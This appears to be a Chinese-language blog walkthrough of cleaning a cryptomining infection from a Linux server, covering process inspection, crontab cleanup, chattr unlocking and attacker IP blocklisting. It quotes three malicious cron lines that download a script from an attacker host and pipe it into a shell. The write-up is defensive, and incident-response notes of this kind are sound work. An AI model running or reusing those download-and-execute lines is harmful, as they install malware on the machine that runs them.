清除 挖矿脚本 攻击
1.查看系统进程,是否有异常: top
发现CPU占用率200%,判定服务器已经被植入木马
2.查看异常进程是哪一个程序造成的 ls -al /proc/14618
发现恶意程序(绿色的是可执行文件)/etc/lafy
3.删除恶意程序
cd /etc
rm -rf lzfy
4.发现过了一会,lzfy恶意程序再次出现,怀疑是个定时任务
查看定时任务 crontab -l
发现有3个下载的可疑行为,下载木马脚本
一共发现3个可疑的攻击脚本的网络地址
*/13 * * * * url -fsSL http://w.3ei.xyz:43768/lll.sh | sh
*/2 * * * * wget -O .cmd http://w.3ei.xyz:43768/lll.sh && bash .cmd
*/12 * * * * curl -fsSL http://w.3ei.xyz:43768/crontab.sh | sh
先杀死程序 kill -9 14618
清除定时任务 crontab -e
如果定时任务不能删除可能是文件属性+i操作
cd var/spool/crontab
chattr -ia cron
删除root用户的定时任务
rm -rf root
再次删除恶意程序
cd /etc
rm -rf lzfy
5.清除临时目录其他可疑文件
cd tmp
ll
6.查看可疑的网络连接
lsof -i
lsof -c lzfy
7.追踪攻击者IP
ping 域名获取攻击者IP地址
打开cmd
ping w.3ei.xyz
获得IP地址为220.194.237.43
8.最后拿到的可疑IP地址列表
47.101.30.124
218.28.144.38
140.143.35.89
将上述IP列表加入黑名单即可。
9.附件:从服务器上查看近期上传的可疑文件
10.最终获得所有黑客攻击的文件,
3个shell脚本
crontab.sh,lll.sh,update.sh
3个exe攻击程序副本
bajx,lzfy,pvds
1个js挖矿脚本
3个试探攻击文件
rzx,systemctI,yums
(撒花)晒尸体
黑客hello网站地址:
作者:xzlAwin
日期:2019.04.24